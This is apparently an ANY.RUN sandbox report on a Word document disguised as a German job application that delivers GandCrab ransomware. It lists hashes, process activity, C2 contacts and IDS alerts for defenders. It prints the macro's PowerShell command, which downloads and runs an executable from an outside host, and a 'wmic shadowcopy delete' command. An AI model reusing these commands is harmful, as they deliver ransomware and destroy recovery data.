analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bewerbung_Lena_Schwarz.doc

Full analysis: https://app.any.run/tasks/e72d8266-16ba-4cef-a7c5-98c779c4604a
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: December 18, 2018, 08:03:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
ransomware
gandcrab
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

E9CE01FB0F565A95B8BF66A0FA32D11B

SHA1:

5B9B714AF457F7813BAAAD07B85C2BB8D2AE51F2

SHA256:

A75EF9B9FE8F637EEF6348F2F3AAB7F635FC0B64F383F49B06D84B54121A7A17

SSDEEP:

1536:SYzOtUwRhX/i2nR3BxHlqKOfLK8eps7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJo:F0UqX/icFBBYfWJsdLragb7JJJUJJJPL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3348)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3280)
    • GandCrab keys found

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3280)
    • Writes file to Word startup folder

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3776)
    • Deletes shadow copies

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Renames files like Ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Actions looks like stealing of personal data

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Dropped file may contain instructions of ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Connects to CnC server

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Changes settings of System certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
  • SUSPICIOUS

    • Creates files in the program directory

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Creates files in the user directory

      • powershell.exe (PID: 3776)
      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3776)
    • Creates files like Ransomware instruction

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Reads the cookies of Mozilla Firefox

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Reads Internet Cache Settings

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Adds / modifies Windows certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3280)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 3280)
      • powershell.exe (PID: 3776)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3280)
    • Dropped object may contain TOR URL's

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: User
Subject: -
Title: -

XML

ModifyDate: 2018:12:18 05:50:00Z
CreateDate: 2018:12:18 05:42:00Z
RevisionNumber: 2
LastModifiedBy: User
Keywords: -
AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: -
Template: summerjam

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1511
ZipCompressedSize: 404
ZipCRC: 0x23cbfb46
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB ctftvkegqqyvcgmqcrbbttznbxrqj.exe wmic.exe no specs explorer.exe no specs Shell Security Editor no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3280"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3348cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3776powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2448"C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe" C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
3968"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exectftvkegqqyvcgmqcrbbttznbxrqj.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3532"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3264C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2376"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\AADIBVT-DECRYPT.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 512
Read events
1 205
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
277
Text files
225
Unknown types
18

Dropped files

PID
Process
Filename
Type
3280WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8B7D.tmp.cvr
MD5:
SHA256:
3280WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0617B4C.png
MD5:
SHA256:
3776powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3U0PEQ3PAC177DB7JPO.temp
MD5:
SHA256:
2448ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
3280WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4CDEA1A-446A-445F-BA69-DAB98D7F756F}.tmpbinary
MD5:32A214AA6F5C0C005379DB477169E1CD
SHA256:9FBA5E06E6594CFCD596C498F0283AF4B06BBE25353CBD53EDCD561BAFBA6A4A
3280WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E237B48-06FC-47CF-9681-DDB7C049A5F3}.tmpsmt
MD5:0AA5DB1388373EF0B3425E65C7C2A01F
SHA256:C70EAED267AA52C30D6209DBCC91602CC754887C8C53034405CC1EBEF04FA402
3776powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2448ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\AADIBVT-DECRYPT.txttext
MD5:F12313658A868B2113A23F91C95CBBC2
SHA256:F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4
3280WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$werbung_Lena_Schwarz.docpgc
MD5:14DD569DA6EB4450EFAD661DE8E4C881
SHA256:A90D5AF739E54AF3DDFB86EBF226B52BD15DD214170FED547A100D0CCD8221A5
2448ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\AppData\AADIBVT-DECRYPT.txttext
MD5:F12313658A868B2113A23F91C95CBBC2
SHA256:F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
77
TCP/UDP connections
133
DNS requests
68
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
212.59.186.61:80
http://www.hotelweisshorn.com/
CH
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
83.138.82.107:80
http://www.swisswellness.com/
DE
whitelisted
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
78.46.77.98:80
http://www.2mmotorsport.biz/
DE
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
302
192.185.159.253:80
http://www.pizcam.com/
US
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
83.166.138.7:80
http://www.whitepod.com/
CH
whitelisted
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
104.24.22.22:80
http://www.belvedere-locarno.com/
US
shared
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
POST
217.26.53.161:80
http://www.haargenau.biz/static/graphic/daessees.bmp
CH
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
217.26.53.37:80
http://www.hrk-ramoz.com/
CH
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
80.244.187.247:80
http://www.hotelfarinet.com/
GB
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
200
136.243.13.215:80
http://www.holzbock.biz/
DE
html
1.78 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
192.185.159.253:80
www.pizcam.com
CyrusOne LLC
US
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
138.201.162.99:80
www.fliptray.biz
Hetzner Online GmbH
DE
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
83.138.82.107:80
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
212.59.186.61:80
www.hotelweisshorn.com
green.ch AG
CH
malicious
3776
powershell.exe
94.96.135.211:80
topwarenhub.top
Saudi Telecom Company JSC
SA
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
192.185.159.253:443
www.pizcam.com
CyrusOne LLC
US
malicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
136.243.13.215:80
www.holzbock.biz
Hetzner Online GmbH
DE
suspicious
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
83.166.138.7:443
www.whitepod.com
Infomaniak Network SA
CH
malicious

DNS requests

Domain
IP
Reputation
topwarenhub.top
  • 94.96.135.211
  • 93.152.165.187
  • 109.175.6.103
  • 213.6.58.250
  • 178.164.181.105
  • 94.190.187.35
  • 84.238.172.65
  • 89.190.74.198
  • 86.61.75.99
  • 62.141.244.144
malicious
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
dns.msftncsi.com
  • 131.107.255.255
shared
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 138.201.162.99
malicious
www.pizcam.com
  • 192.185.159.253
unknown
www.swisswellness.com
  • 83.138.82.107
whitelisted
www.hotelweisshorn.com
  • 212.59.186.61
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
3776
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3776
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3776
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
3776
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3776
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3776
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
2448
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
No debug info